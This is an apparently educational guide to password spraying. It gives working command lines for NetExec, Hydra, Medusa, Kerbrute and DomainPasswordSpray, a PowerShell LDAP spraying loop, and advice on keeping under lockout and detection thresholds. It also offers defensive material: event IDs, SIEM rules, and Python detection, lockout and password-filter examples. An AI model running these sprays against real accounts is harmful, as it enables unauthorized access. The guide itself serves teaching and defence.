A Comprehensive Guide to Password Spraying Attacks
Introduction
Password spraying is a type of brute-force attack where a malicious actor attempts to gain unauthorized access to a large number of accounts with a few commonly used passwords. Unlike traditional brute-force attacks that target a single account with many passwords, password spraying uses a "low-and-slow" approach to avoid account lockouts and detection mechanisms. This technique has become increasingly popular among threat actors and remains one of the most effective methods for gaining initial access to organizational networks.
According to MITRE ATT&CK, password spraying is classified as technique T1110.003 under the Credential Access tactic. This guide provides a comprehensive overview of password spraying attacks, including the techniques, tools, and mitigation strategies for both Linux and Windows environments.
Password Spraying vs. Related Attack Methods
It is important to understand how password spraying differs from other credential-based attacks:
| Attack Type | Description | Detection Difficulty |
|---|---|---|
| Password Spraying | One or a few passwords are tried against many different accounts | Medium to High |
| Credential Stuffing | Stolen username/password pairs from one data breach are used against other services | Medium |
| Brute Force (Traditional) | Many different passwords are tried against a single account | Low (easily detected by account lockout) |
| Dictionary Attack | Passwords from a predefined list are tried against accounts | Low to Medium |
Commonly Targeted Protocols and Services
Password spraying attacks can be performed against a variety of protocols and services. Organizations must understand which services are most at risk in their environments. The following table lists the most common targets:
| Protocol/Service | Port | Environment | Risk Level |
|---|---|---|---|
| SSH | 22/TCP | Linux/Unix | High |
| SMB | 445/TCP | Windows | Critical |
| RDP (Remote Desktop Protocol) | 3389/TCP | Windows | Critical |
| LDAP / LDAPS | 389/TCP, 636/TCP | Windows (Active Directory) | High |
| Kerberos | 88/TCP, 88/UDP | Windows (Active Directory) | High |
| FTP | 21/TCP | Cross-platform | Medium |
| Telnet | 23/TCP | Cross-platform | Medium |
| HTTP/HTTPS | 80/TCP, 443/TCP | Cross-platform | Medium |
| Microsoft SQL Server | 1433/TCP | Windows | High |
| Oracle Database | 1521/TCP | Cross-platform | High |
| MySQL | 3306/TCP | Cross-platform | Medium |
| VNC | 5900/TCP | Cross-platform | Medium |
Password Spraying Tools
Several tools are commonly used by security professionals and threat actors to perform password spraying attacks. Understanding these tools is essential for both attackers and defenders. The following table provides an overview of the most popular tools:
| Tool Name | Supported Protocols | Platform | Key Features |
|---|---|---|---|
| NetExec (nxc) | SMB, SSH, FTP, RDP, LDAP, WMI, MSSQL | Linux/Windows | Multithreaded, supports multiple protocols, active development |
| Hydra | SSH, FTP, Telnet, HTTP, LDAP, SMB, and many others | Linux/Windows/macOS | Fast, flexible, supports 50+ protocols, widely used |
| Medusa | SSH, FTP, Telnet, HTTP, LDAP, SMB, and others | Linux/Windows | Massively parallel, modular, flexible user input |
| Kerbrute | Kerberos (Active Directory) | Linux/Windows | User enumeration, password spraying, AS-REP hash capture |
| DomainPasswordSpray | Active Directory (LDAP bind) | Windows | PowerShell-based, pulls the user list and lockout policy from the domain automatically |
| Spray-AD | Active Directory (Kerberos) | Windows (Cobalt Strike) | Cobalt Strike integration, safe mode, customizable |
Practical Examples: Password Spraying in Action
Linux Environment Examples
SSH Password Spraying with NetExec (nxc)
NetExec (nxc) is the actively maintained successor to CrackMapExec and sprays SSH directly. Multiple passwords are given as separate arguments, and with both a user list and several passwords nxc tries every user/password combination unless --no-bruteforce is set, so count the attempts per account against the target's lockout or fail2ban threshold:
# Basic SSH password spray against a subnet
nxc ssh 192.168.1.0/24 -u usernames.txt -p 'Password123' --continue-on-success
# Spray several passwords against one host (each password is a separate argument, not one quoted string)
nxc ssh 192.168.1.100 -u admin -p 'Password123' 'Welcome1' 'Summer2025'
# Spray with verbose output
nxc ssh 192.168.1.0/24 -u users.txt -p 'Password123' --verbose
SSH Password Spraying with Hydra
Hydra is one of the most popular password-guessing tools and supports dozens of protocols. One detail matters for spraying: given both -L and -P, hydra by default tries every password against one user before moving to the next, which is the brute-force order that lockout policies catch; -u flips the loop so each round tries one password across all users:
# Basic SSH password spray
hydra -L usernames.txt -p 'Password123' ssh://192.168.1.100
# SSH spray with multiple passwords: -u loops over users for each password (one attempt per account per round); -t 4 limits parallel connections, which sshd rate-limits
hydra -L usernames.txt -P passwords.txt -u -t 4 ssh://192.168.1.100
# SSH spray with custom port
hydra -L usernames.txt -p 'Password123' ssh://192.168.1.100:2222
# FTP password spray
hydra -L usernames.txt -p 'Password123' ftp://192.168.1.100
# Telnet password spray
hydra -L usernames.txt -p 'Password123' telnet://192.168.1.100
Medusa for Multi-Protocol Spraying
Medusa offers a massively parallel approach to password spraying:
# SSH password spray with Medusa
medusa -h 192.168.1.100 -u admin -p 'Password123' -M ssh
# Multiple hosts and users
medusa -H hosts.txt -U users.txt -p 'Password123' -M ssh -t 10
# FTP password spray
medusa -h 192.168.1.100 -u admin -p 'Password123' -M ftp
Windows Environment Examples
SMB Password Spraying with NetExec (nxc)
NetExec is highly effective for SMB-based password spraying in Windows environments. Every failed attempt is an NTLM validation on a domain controller, so it increments badPwdCount and is logged there (4776) as well as on the target host (4625):
# Basic SMB password spray
nxc smb 10.10.10.0/24 -u usernames.txt -p 'Summer2025' --continue-on-success
# Spray several passwords against a single host (separate arguments; every user/password pair is tried unless --no-bruteforce is set, so keep the count below the domain lockout threshold)
nxc smb 10.10.10.50 -u admin -p 'Password1' 'Password2' 'Summer2025'
# Check username == password (--no-bruteforce pairs line N of the user file with line N of the password file)
nxc smb 10.10.10.50 -u users.txt -p users.txt --no-bruteforce --continue-on-success
# Spray with verbose output
nxc smb 10.10.10.0/24 -u users.txt -p 'Welcome1' --verbose
Kerberos Password Spraying with Kerbrute
Kerbrute is specifically designed for Kerberos-based attacks against Active Directory. A failed pre-authentication does not produce the 4625 logon-failure event; it is recorded as 4771, and only when Kerberos Authentication Service auditing is enabled on the DC, so it is often missed. Sprays still count toward lockout; only userenum is lockout-free, because it never presents a password:
# User enumeration (no lockout risk: no password is sent; the DC answers KDC_ERR_PREAUTH_REQUIRED for users that exist)
./kerbrute userenum --dc 10.10.10.1 -d active.local users.txt
# Password spray with Kerbrute
./kerbrute passwordspray --dc 10.10.10.1 -d active.local valid_users.txt 'Welcome1!'
# Brute force a single user
./kerbrute bruteuser --dc 10.10.10.1 -d active.local passwords.txt admin
# Safe mode (stops if account lockout detected)
./kerbrute passwordspray --dc 10.10.10.1 -d active.local users.txt 'Password123' --safe
Active Directory Password Spraying with DomainPasswordSpray.ps1
DomainPasswordSpray is a PowerShell script for Active Directory environments. Before spraying it reads the domain lockout policy and, unless a user list is supplied, the enabled users over LDAP, and it prompts for confirmation before starting:
# Basic password spray
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password 'Winter2025' -Domain active.local
# Spray with a delay (in seconds) between attempts, your own user list, and results written to a file
Invoke-DomainPasswordSpray -Password 'Summer2025' -Domain active.local -UserList valid_users.txt -Delay 5 -OutFile sprayed-creds.txt
# -Force skips the confirmation prompt shown before spraying (it does not bypass the lockout policy)
Invoke-DomainPasswordSpray -Password 'Password123' -Domain active.local -Force
LDAP Password Spraying
LDAP-based spraying is often called stealthier than SMB because nothing touches member servers: the only failures are on the domain controller, recorded as 4771 (Kerberos) or 4625 plus 4776 (NTLM) depending on how the bind authenticates, and each one still increments badPwdCount. Here is an example using PowerShell's System.DirectoryServices.Protocols:
# LDAP password spray using PowerShell (System.DirectoryServices.Protocols)
Add-Type -AssemblyName System.DirectoryServices.Protocols
$domain   = "active.local"
$password = "Password123"
$users    = @("user1", "user2", "user3")
foreach ($user in $users) {
    # ${domain} is required: "$domain:389" is parsed as a scoped variable and expands to nothing
    $ldap = New-Object System.DirectoryServices.Protocols.LdapConnection("${domain}:389")
    $ldap.AuthType   = [System.DirectoryServices.Protocols.AuthType]::Negotiate
    $ldap.Credential = New-Object System.Net.NetworkCredential($user, $password, $domain)
    try {
        $ldap.Bind()
        Write-Host "[+] Valid credentials: $user : $password"
    } catch {
        # Bind failures surface as an LdapException (error 49 = invalidCredentials); print the message to tell them apart from connection errors
        Write-Host "[-] Failed: $user ($($_.Exception.Message))"
    } finally {
        $ldap.Dispose()
    }
    Start-Sleep -Seconds 1   # pace attempts; each failure still counts toward lockout on the DC
}
Detection and Monitoring
Key Indicators of Password Spraying Attacks
Organizations should monitor for the following indicators that suggest a password spraying attack is in progress:
- A high number of failed login attempts from a single IP address across multiple accounts
- Failed login attempts from multiple IP addresses targeting the same set of accounts
- Unusual patterns in authentication logs (e.g., attempts at specific intervals)
- Successful login followed by immediate logout or inactivity
- Attempts targeting service accounts or default usernames
Windows Event IDs to Monitor
The following Windows Event IDs are particularly important for detecting password spraying. Note where each is written: 4625 appears on whichever host rejected the logon, while 4768, 4771, 4776 and 4740 are domain-controller events. (On Linux, sshd writes "Failed password for ..." lines to auth.log or the journal.)
| Event ID | Description | Attack Method |
|---|---|---|
| 4625 | An account failed to log on | Any failed logon on the host that rejected it (SMB, RDP, WinRM, NTLM LDAP binds to a DC); logon type 3 for network attempts |
| 4771 | Kerberos pre-authentication failed | Kerberos sprays (Kerbrute, Spray-AD); requires Audit Kerberos Authentication Service on the DC |
| 4768 | A Kerberos authentication ticket (TGT) was requested | User enumeration and Kerberos sprays; failure code 0x6 marks a user that does not exist |
| 4776 | The computer attempted to validate the credentials for an account | NTLM validation on the DC for any NTLM logon in the domain; 0xC000006A = wrong password, 0xC0000234 = account locked out |
| 4740 | A user account was locked out | A spray that crossed the lockout threshold; a burst of 4740 events across many accounts is itself a strong indicator |
SIEM Configuration for Detection
A Security Information and Event Management (SIEM) solution should correlate authentication failures by source and by account and alert on conditions such as:
- More than 5 failed login attempts from a single IP address in a 10-minute window
- Failed login attempts against 10 or more different user accounts from a single IP address in the same window
- Multiple failed Kerberos pre-authentication attempts (Event ID 4771) from a single IP address
- A successful login from an IP address that had multiple failed attempts shortly before
These thresholds are starting points to tune per environment. A spray spread across many source addresses only shows up when the rule counts accounts rather than addresses.
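The conditions above as running detection logic, added here as an example and not taken from the original guide. It is a sliding-window detector over constructed, already-normalized authentication events (timestamp, source IP, account, result), the shape a SIEM would produce from Windows 4625/4771/4776 or sshd failures. The first three rules are the ones listed; the fourth goes beyond the list and counts distinct accounts regardless of source IP, which is what catches a spray spread across many addresses. Thresholds, IPs and account names are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)
MAX_FAILS_PER_IP = 5           # rule 1: more than 5 failures from one source IP in the window
MIN_ACCOUNTS_PER_IP = 10       # rule 2: failures against 10 or more distinct accounts from one IP
MIN_FAILS_BEFORE_SUCCESS = 3   # rule 3: a success from an IP that already has 3+ recent failures
MIN_ACCOUNTS_SPRAYED = 10      # rule 4 (account-level): 10+ accounts failing in the window ...
MAX_FAILS_PER_ACCOUNT = 2      # ... with at most 2 failures each, whatever the source IPs


def parse_event(line):
    """'2025-06-01T09:00:00,203.0.113.7,user01,FAIL' -> (datetime, ip, account, succeeded)."""
    ts, ip, user, result = line.strip().split(",")
    return datetime.fromisoformat(ts), ip, user, result == "OK"


class SprayDetector:
    """Feed events in time order; each call returns the alert names that event triggers."""

    def __init__(self):
        self.by_ip = defaultdict(deque)   # ip -> deque of (ts, account) failures inside WINDOW
        self.recent = deque()             # every failure inside WINDOW as (ts, ip, account)

    def _expire(self, now):
        cutoff = now - WINDOW
        for fails in self.by_ip.values():
            while fails and fails[0][0] < cutoff:
                fails.popleft()
        while self.recent and self.recent[0][0] < cutoff:
            self.recent.popleft()

    def feed(self, line):
        ts, ip, user, ok = parse_event(line)
        self._expire(ts)
        alerts = []
        if ok:
            # Rule 3: the spray found a password (a user recovering from typos stays under the threshold)
            if len(self.by_ip[ip]) >= MIN_FAILS_BEFORE_SUCCESS:
                alerts.append(f"success_after_failures:{ip}:{user}")
            return alerts
        self.by_ip[ip].append((ts, user))
        self.recent.append((ts, ip, user))
        fails = self.by_ip[ip]
        if len(fails) > MAX_FAILS_PER_IP:                              # rule 1
            alerts.append(f"fail_burst:{ip}")
        if len({u for _, u in fails}) >= MIN_ACCOUNTS_PER_IP:          # rule 2
            alerts.append(f"many_accounts_one_ip:{ip}")
        per_account = defaultdict(int)                                 # rule 4, keyed on account not IP
        for _, _, u in self.recent:
            per_account[u] += 1
        if len(per_account) >= MIN_ACCOUNTS_SPRAYED and max(per_account.values()) <= MAX_FAILS_PER_ACCOUNT:
            alerts.append("account_level_spray")
        return alerts


def detect(lines):
    """Run a fresh detector over time-ordered events and return the distinct alerts raised."""
    detector = SprayDetector()
    return sorted({alert for line in lines for alert in detector.feed(line)})


def _events(start, pairs, step_seconds, result="FAIL"):
    t0 = datetime.fromisoformat(start)
    return [f"{(t0 + timedelta(seconds=i * step_seconds)).isoformat()},{ip},{user},{result}"
            for i, (ip, user) in enumerate(pairs)]


# Constructed sample events (not real logs); documentation IP ranges and made-up accounts.
SINGLE_SOURCE = _events("2025-06-01T09:00:00",
                        [("203.0.113.7", f"user{i:02d}") for i in range(1, 13)], 20) + \
                ["2025-06-01T09:05:00,203.0.113.7,svc_backup,OK"]       # one password, 12 accounts, then a hit
DISTRIBUTED = _events("2025-06-01T11:00:00",
                      [(f"198.51.100.{1 + i % 3}", f"emp{i:02d}") for i in range(12)], 15)  # 4 tries per IP
TYPOS = _events("2025-06-01T13:00:00", [("10.0.0.5", "alice")] * 2, 30) + \
        ["2025-06-01T13:01:30,10.0.0.5,alice,OK"]                       # a user mistyping twice

if __name__ == "__main__":
    for name, lines in (("single source", SINGLE_SOURCE), ("distributed", DISTRIBUTED), ("typos", TYPOS)):
        print(f"{name}: {detect(lines)}")
```

The distributed sample never trips the per-IP rules (four failures per address, well under both thresholds) and is caught only by the account-level count; the two typos by alice trip nothing. Real deployments key rule 4 on a per-account failure count drawn from 4776 or 4771 on the DCs, since those see every attempt in the domain whichever host was targeted.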
Mitigation and Defense Strategies
Technical Controls
Multi-Factor Authentication (MFA)
Multi-Factor Authentication is one of the most effective defenses against password spraying attacks. Even if an attacker obtains valid credentials, they cannot gain access without the second factor. Organizations should prioritize implementing MFA for:
- Remote access services (VPN, RDP, SSH)
- Administrative accounts
- Email and collaboration platforms
- Cloud services and SaaS applications
Account Lockout Policies
Account lockout caps how many passwords an attacker can try per account within one observation window; it does not stop spraying outright, because sprayers read the policy first (DomainPasswordSpray does this automatically) and stay one or two attempts below the threshold. Set it tight enough to bound the rate but not so tight that an attacker can lock out the whole directory on purpose. Recommended settings:
- Lock the account after 5-10 failed login attempts (the threshold)
- Lockout duration of 15-30 minutes
- Reset the failed-attempt counter after 15-30 minutes with no further failures (the observation window, which Windows measures from the last bad password and requires to be no longer than the lockout duration)
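A worked model of these settings, added here as an example and not part of the original guide: Windows-style lockout in which badPwdCount resets only once the observation window has elapsed since the last bad password (badPasswordTime), which is the detail that decides whether a spray round is safe. The policy values are the recommended ones above; the accounts, guesses and timings are constructed.

```python
from datetime import datetime, timedelta


class LockoutPolicy:
    """Windows-style settings; defaults are the values recommended above.
    Windows requires duration >= observation window, which this model assumes."""
    def __init__(self, threshold=5, duration=timedelta(minutes=30), observation=timedelta(minutes=30)):
        self.threshold, self.duration, self.observation = threshold, duration, observation


class Account:
    def __init__(self, password):
        self.password = password
        self.bad_count = 0         # badPwdCount
        self.bad_time = None       # badPasswordTime: when the LAST wrong password was seen
        self.locked_until = None   # lockoutTime + duration


def attempt(account, guess, now, policy):
    """Validate one logon at time `now`; return 'ok', 'bad' or 'locked'."""
    if account.locked_until is not None and now < account.locked_until:
        return "locked"            # even the right password is refused while locked
    # The counter resets only when the window has elapsed since the LAST bad attempt, not the
    # first: a round that waits 30 minutes from its first guess is still inside the window of its last.
    if account.bad_time is not None and now - account.bad_time >= policy.observation:
        account.bad_count = 0
    if guess == account.password:
        account.bad_count = 0
        return "ok"
    account.bad_count += 1
    account.bad_time = now
    if account.bad_count >= policy.threshold:
        account.locked_until = now + policy.duration
    return "bad"


def spray(account, guesses, times, policy):
    """Try each guess at its time and return the outcomes in order."""
    return [attempt(account, g, t, policy) for g, t in zip(guesses, times)]


T0 = datetime(2025, 6, 1, 9, 0)   # constructed start time


def at(minutes):
    return T0 + timedelta(minutes=minutes)


def schedule(round_gap_minutes, per_round=4, rounds=2):
    """Attempt times for `rounds` rounds of `per_round` guesses one minute apart."""
    return [at(r * round_gap_minutes + i) for r in range(rounds) for i in range(per_round)]


WRONG = [f"Guess{i}" for i in range(8)]   # constructed guesses, none correct

if __name__ == "__main__":
    policy = LockoutPolicy()
    print("rounds 30 min apart:", spray(Account("x"), WRONG, schedule(30), policy))
    print("rounds 34 min apart:", spray(Account("x"), WRONG, schedule(34), policy))
    print("6 in a row:", spray(Account("x"), WRONG[:6], [at(m) for m in range(6)], policy))
    acct = Account("x")
    spray(acct, WRONG[:4], schedule(30)[:4], policy)
    print("user typo after a 4-guess round:", attempt(acct, "typo", at(5), policy),
          "-> then the correct password:", attempt(acct, "x", at(6), policy))
```

The first run shows the trap the observation window sets: the second round starts 30 minutes after the round's first guess but only 27 after its last, so the counter never reset and the fifth guess locks the account. The last run shows the collateral cost of spraying right up to threshold minus one: a single typo by the real user then locks them out, which is why careful sprayers stop at threshold minus two and why a wave of 4740 lockouts is worth alerting on.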
Password Policy
A strong password policy removes the guesses that sprays rely on. Length and a blocklist do more than composition rules, which on their own tend to produce exactly the Summer2025!-style passwords sprayers try first:
- Minimum password length of 12-14 characters
- Complexity requirements (upper/lower case, digits, symbols) only alongside length and a blocklist, never as the main control
- Password history to prevent reuse
- A password filter that rejects common and breached passwords, including season or company name plus year patterns
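A minimal filter of the kind the last bullet describes, added as an example and not taken from the guide or from any product: it undoes leet-speak substitutions, scores how much of the password is left once banned words are removed, and separately rejects the banned-word-plus-digits-and-symbols shape that the spray candidates on this page (Summer2025, Welcome1, Password123) all share. The banned list, scoring thresholds and the use of "active" as a stand-in for the organisation name are assumptions; a real deployment would draw on a large breached-password list.

```python
import re

# Constructed banned list for the example: generic terms, the seasons behind the page's own
# spray candidates, and "active" standing in for the organisation name (an assumption).
BANNED = ["password", "welcome", "letmein", "qwerty", "admin",
          "summer", "winter", "spring", "autumn", "fall", "active"]

# Leet-speak substitutions undone before matching (1 is read as "i"; "l" is the other common
# reading, and a production filter would try both).
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s", "7": "t",
                      "@": "a", "$": "s", "!": "i"})

# The spray-candidate shape: one banned word, up to four digits, up to three symbols, nothing else.
SPRAY_PATTERN = re.compile(r"(?:" + "|".join(map(re.escape, BANNED)) + r")\d{0,4}[^a-z0-9]{0,3}")


def normalize(password):
    return password.lower().translate(LEET)


def score(password):
    """Strip banned words (longest first) from the normalized password and return
    (points, matched): each banned word is worth 1 point, each leftover character 1 point."""
    remaining = normalize(password)
    matched = []
    for word in sorted(BANNED, key=len, reverse=True):
        if word in remaining:
            matched.append(word)
            remaining = remaining.replace(word, "")
    return len(matched) + len(remaining), matched


def check_password(password, min_length=12, min_points=5):
    """Return None when the password is acceptable, otherwise the reason it is rejected."""
    if SPRAY_PATTERN.fullmatch(password.lower()):
        return "banned word plus digits/symbols"
    points, matched = score(password)
    if matched and points < min_points:
        return "too close to banned word(s): " + ", ".join(matched)
    if len(password) < min_length:
        return "too short"
    return None


if __name__ == "__main__":
    for pw in ["Summer2025!", "Welcome1", "P@ssw0rd!", "Tr0ub4dor&3", "correct-horse-battery-staple"]:
        print(f"{pw!r}: {check_password(pw) or 'accepted'}")
```

The point system matters because "P@ssw0rd!" passes every complexity rule and is not on a plain blocklist; once normalized it is the word "password" plus one character, and the pattern check catches the season-plus-year family that scoring alone lets through when the year and symbol add enough characters.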
Network Segmentation
Limit access to sensitive services by implementing network segmentation:
- Restrict SSH access to specific IP ranges
- Use VPN or bastion hosts for remote access
- Implement firewall rules to limit access to management services
Service Hardening
Disable or restrict access to unnecessary services:
- Disable or restrict SSH access when not needed
- Use non-standard ports for management services (this only trims scanner noise and must not stand in for the controls above)
- Implement IP whitelisting for administrative access
- Use certificate-based authentication instead of passwords where possible
Operational Controls
Monitoring and Alerting
Implement comprehensive logging and alerting for authentication events. Ensure that SIEM systems are configured to detect and alert on suspicious patterns.
Incident Response
Develop and maintain an incident response plan for password spraying attacks. This should include:
- Procedures for identifying and containing the attack
- Steps for investigating the scope of the compromise
- Communication protocols for notifying affected users and stakeholders
- Recovery procedures and post-incident analysis
User Education
User education is a critical component of any security program. Users should be trained on:
- The importance of strong, unique passwords
- The risks of password reuse across multiple systems
- How to recognize and report suspicious activity
- The proper use of Multi-Factor Authentication
Advanced Evasion Techniques
Throttling and Timing
Attackers often throttle their password spraying attempts to avoid triggering security alerts. By spacing out attempts over hours or days, attackers can stay below detection thresholds. This is why monitoring for subtle patterns is important.
LDAP and Kerberos-Based Attacks
Kerberos and LDAP-based sprays do not produce the 4625 logon-failure events that defenders most often watch. A failed Kerberos pre-authentication is recorded only as 4771, and only on domain controllers where Kerberos Authentication Service auditing is enabled; an LDAP bind failure is logged on the DC alone rather than on a member server. The events exist, but they land in different places under different IDs, which is why DC auditing must cover 4771, 4768 and 4776 and not just 4625.
Distributed Attacks
Attackers may distribute their password spraying attempts across multiple IP addresses to avoid IP-based detection. This requires more sophisticated detection mechanisms that focus on account-level patterns rather than IP-level patterns.
Conclusion
Password spraying remains a popular and effective attack vector for malicious actors seeking initial access to organizational networks. By understanding the techniques and tools used in these attacks, and by implementing a defense-in-depth security strategy, organizations can significantly reduce their risk of compromise.
The key to defending against password spraying attacks is a combination of strong technical controls (particularly Multi-Factor Authentication), vigilant monitoring and alerting, regular security assessments, and ongoing user education. Organizations should also maintain an up-to-date inventory of all systems and services that are exposed to the internet, and ensure that these systems are properly hardened and monitored.
As threat actors continue to evolve their tactics, organizations must remain vigilant and continuously improve their security posture. Regular penetration testing and red team exercises can help identify weaknesses in defenses before they are exploited by real attackers.